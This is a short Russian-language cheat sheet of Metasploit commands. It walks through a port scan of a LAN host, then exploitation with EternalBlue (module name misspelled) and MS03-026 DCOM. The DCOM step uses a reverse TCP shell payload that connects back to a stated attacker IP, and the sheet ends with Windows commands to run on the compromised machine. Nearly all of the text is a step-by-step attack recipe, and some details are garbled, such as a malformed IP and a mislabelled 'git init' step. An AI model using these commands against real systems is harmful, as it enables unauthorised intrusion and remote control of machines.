use kali linux
1 2 3 4 |
0) msfconsole - запуск метасплоит 1) use exploit/windows/smb/ms17_10_enternelblue - выбор эксплоита 2) set rhost 127.0.0.01 - выбор ip атакуемого 3) exploit - применить эксплоит |
примеры команд
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
https://localhost:3790/ - веб интерфейс msfconsole - запуск метасплоит db_status - проверка базы git init - проврка запуска метасполоит use auxiliary/scanner/portscan/tcp - использовать сканер set PORTS 1-5000 - задать диапазон портов для сканирования set RHOSTS 192.168.88.161 - задать ip для сканирования run - запуск search dcom - поиск эксплоитов dcom use exploit/windows/dcerpc/ms03_026_dcom - будем использовать эксплоит set payload windows/shell_reverse_tcp - в случае удачи заливаем нагрузку shell_reverse_tcp show options - смотрим обязательные опции для нагрузки set RHOSTS 192.168.88.161 - IP той машины, которую будем проверять на защищенность set LHOST 192.168.88.247 - IP злоумышленника run - запуск cd ..\..\ - видовая команда перехода между каталогами ( скорее всего попадем на диск C:\ ) (.. вернутся на каталог выше) ( . текущий каталог) echo Hello! > achtung.x - создать текстовый файл achtung.x с содержимым Hello! msg helo - виндовая команда посылки сообщения можно вводить любую команду, как в обычном cmd.exe |